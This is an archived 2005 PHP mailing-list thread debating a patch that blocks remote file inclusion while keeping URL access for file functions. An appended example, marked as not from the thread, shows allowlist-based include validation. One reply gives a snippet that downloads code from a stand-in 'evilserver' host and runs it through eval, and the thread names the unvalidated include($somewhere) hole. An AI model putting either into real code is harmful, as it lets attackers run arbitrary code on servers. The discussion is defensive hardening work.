[PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements

2005-03-02 Thread Jason Barnett
Tom Z. Meinlschmidt wrote:
> Hi,
>
> I've experienced a lot of attacks in my hosting server due to silly users and
> their scripts with holes. So I prepared this little patch to 4.3.10, which
> disables using url wrappers in include/include_once/require/require_once
> statements (switchable in php.ini). See readme.security from patch
>
> patch is there:
>
> http://orin.meinlschmidt.org/~znouza/php_patch.txt
>
> comments are welcome
>
> /tom
>

http://php.net/manual/en/ini.php#ini.list

allow_url_fopen = 0

-- 
Teach a man to fish...

NEW? | http://www.catb.org/~esr/faqs/smart-questions.html
STFA | http://marc.theaimsgroup.com/?l=php-general&w=2
STFM | http://php.net/manual/en/index.php
STFW | http://www.google.com/search?q=php
LAZY | http://mycroft.mozdev.org/download.html?name=PHP&submitform=Find+search+plugins



Re: [PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements

2005-03-02 Thread Jason Wong
On Wednesday 02 March 2005 22:03, Jason Barnett wrote:
> Tom Z. Meinlschmidt wrote:
>
> > which disables using url wrappers in
> > include/include_once/require/require_once statements (switchable in
>
> http://php.net/manual/en/ini.php#ini.list
>
> allow_url_fopen = 0

I haven't had a look at the patch in question but from my understanding of 
the description above, after the application of the patch the filesystem 
functions (ie fopen and friends) should still be able to use URLs. 
Effectively it allows finer control over opening URLs.

I would like to think that the OP wouldn't go to the trouble of creating a 
patch (for the latest release of PHP no less) for functionality that 
already exists! IIRC a request for something similar was made on the list 
some time ago. 

-- 
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
New Year Resolution: Ignore top posted posts

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements

2005-03-02 Thread Tom Z Meinlschmidt
Tell me - how do you want to turn off remote includes and remain remote 
file working?

allow_url_fopen turns off _both_. There's no choice what to disable
tom
Jason Barnett wrote:
> Tom Z. Meinlschmidt wrote:
> > Hi,
> > I've experienced a lot of attacks in my hosting server due to silly users and
> > their scripts with holes. So I prepared this little patch to 4.3.10, which
> > disables using url wrappers in include/include_once/require/require_once
> > statements (switchable in php.ini). See readme.security from patch
> > patch is there:
> > http://orin.meinlschmidt.org/~znouza/php_patch.txt
> > comments are welcome
> > /tom
>
> http://php.net/manual/en/ini.php#ini.list
> allow_url_fopen = 0


Re: [PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements

2005-03-02 Thread Richard Lynch
Tom Z Meinlschmidt wrote:
> Tell me - how do you want to turn off remote includes and remain remote
> file working?

Change the PHP source?

That's the only viable answer I can think of; though I doubt it's one you
want to hear/use.

Sorry.

> allow_url_fopen turns off _both_. There's no choice what to disable

Consider this:

<?php
  eval(implode('',file("http://evilserver.example.com")));
?>

So, like, what's the point to turning off only remote include and keeping
remote file?

Maybe you'll stop a naive newbie from something stupid, but probably not
even slow down a script kiddie, much less a dedicated attacker.

For that matter, even a naive newbie would be able to figure out the
eval(file()) solution or Google for it and find it in less than an hour.

If you turn off eval, they make a file 777 (ugh!) and then read the remote
file, write it into their 777 file, and then include that.

If you don't trust remote include, you can't trust remote files and vice
versa.  That's all there is to it, really.

Anything else is simply self-delusions of security imho.  [shrug]

-- 
Like Music?
http://l-i-e.com/artists.htm




Re: [PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements

2005-03-02 Thread Jason Wong
On Thursday 03 March 2005 03:04, Richard Lynch wrote:
> Tom Z Meinlschmidt wrote:
> > Tell me - how do you want to turn off remote includes and remain
> > remote file working?
>
> Change the PHP source?
>
> That's the only viable answer I can think of; though I doubt it's one
> you want to hear/use.
>
> Sorry.

Funnily enough I think you'll find that he did (change the source) :)

> > allow_url_fopen turns off _both_. There's no choice what to disable
>
> Consider this:
>
> <?php
>   eval(implode('',file("http://evilserver.example.com")));
> ?>
>
> So, like, what's the point to turning off only remote include and
> keeping remote file?

I believe you're missing the point of the patch. It is to prevent people 
from injecting malicious remote locations in $somewhere:

  include($somewhere);

Of course one should always validate $somewhere before using it but ...

-- 
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
New Year Resolution: Ignore top posted posts

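The validation Jason Wong alludes to, as an added example that is not code from the thread or from the patch: the injectable include($somewhere) beside an allowlist version that never hands request data to include at all. Written for PHP 7.1+; the page table and the pages/ directory are assumptions.

```php
<?php
// Added example, not from the thread or the patch. Requires PHP 7.1+.
// The page table and the pages/ directory are assumptions for illustration.

// Vulnerable form: whatever arrives in $somewhere is handed to include,
// so with allow_url_fopen=On (and no patch) a remote URL is fetched and run.
function include_unsafe(string $somewhere): void
{
    include $somewhere;
}

// Hardened form: the request supplies a key, never a path. Unknown keys
// are rejected, so neither a URL nor a local path can be injected.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $key): ?string
{
    if (!array_key_exists($key, PAGES)) {
        return null;                        // not in the allowlist
    }
    $base = realpath(__DIR__ . '/pages');
    $path = realpath($base . '/' . PAGES[$key]);
    // Belt and braces: the resolved file must still live under $base.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function include_safe(string $key): void
{
    $path = resolve_page($key);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Typical entry point: ?page=about
include_safe($_GET['page'] ?? 'home');
```

PHP 5.2 and later separate the two settings the thread argues about: allow_url_include (Off by default) governs include/require, while allow_url_fopen still covers fopen() and friends.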